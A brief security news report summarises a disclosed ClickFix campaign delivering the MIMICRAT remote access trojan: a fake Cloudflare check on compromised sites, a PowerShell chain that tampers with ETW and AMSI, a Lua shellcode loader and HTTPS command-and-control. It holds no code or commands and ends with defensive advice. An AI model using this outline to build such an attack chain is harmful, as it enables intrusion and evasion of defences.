Security researchers disclosed a ClickFix campaign that abused compromised legitimate websites to deliver a previously undocumented remote access trojan named MIMICRAT earlier this month. The malware supports 22 commands and communicates over HTTPS on port 443.
KEY FACTS
- Incident Compromised sites served malicious code to deliver a multi-stage lure
- Malware MIMICRAT is a custom C++ RAT with 22 commands
- Delivery PowerShell chain drops a Lua-based shellcode loader
- Communication HTTPS C2 on port 443 using analytics-like HTTP profiles
- Reach Lure content supports 17 languages and victims in multiple geographies
In a technical analysis Elastic Security Labs said attackers injected malicious JavaScript into a breached BIN validation site to load an externally hosted PHP script that displayed a fake Cloudflare verification page and prompted victims to run a command.
The Run command launched a PowerShell one-liner that fetched a second-stage PowerShell script. That script modifies Windows event tracing and antimalware interfaces before dropping a Lua-based loader. ETW and AMSI are Windows features in Microsoft documentation.
The final stage decrypts and executes in-memory shellcode that installs MIMICRAT. The implant supports Windows token impersonation, SOCKS5 tunneling and extensive process and file system control. It uses localized lure text and HTTP profiles that resemble web analytics traffic.
Identified victims include a US university and multiple Chinese-speaking users. The campaign shares tactics with other ClickFix activity and the loader pipeline has been observed in chains that culminate in ransomware deployment or data exfiltration. The total number of infections was not disclosed.
WHY IT MATTERS
The chain shows how compromised third-party services, multi-stage PowerShell and in-memory loaders can be combined to evade detection. Organizations should review exposure to external services and monitor PowerShell activity and network traffic for signs of this chain.